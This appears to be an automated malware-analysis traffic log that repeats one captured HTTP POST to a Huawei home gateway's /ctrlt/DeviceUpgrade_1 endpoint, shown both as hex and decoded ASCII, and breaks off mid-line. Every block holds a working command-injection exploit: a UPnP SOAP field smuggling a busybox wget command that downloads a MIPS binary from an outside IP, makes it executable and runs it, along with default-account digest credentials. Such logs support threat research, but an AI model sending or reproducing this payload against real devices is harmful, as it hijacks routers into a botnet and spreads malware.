4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 